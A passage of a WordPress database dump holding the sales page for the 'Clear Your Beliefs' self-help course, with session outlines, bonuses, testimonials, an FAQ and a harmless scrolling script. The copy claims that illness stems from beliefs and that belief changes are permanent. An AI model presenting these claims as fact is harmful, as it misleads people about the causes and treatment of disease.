href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1895, 2061, 'rt_custom_css', ''),
(1896, 1720, 'rt_custom_css', ''),
(1897, 588, 'rt_custom_css', '');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1900, 2184, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72785:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a 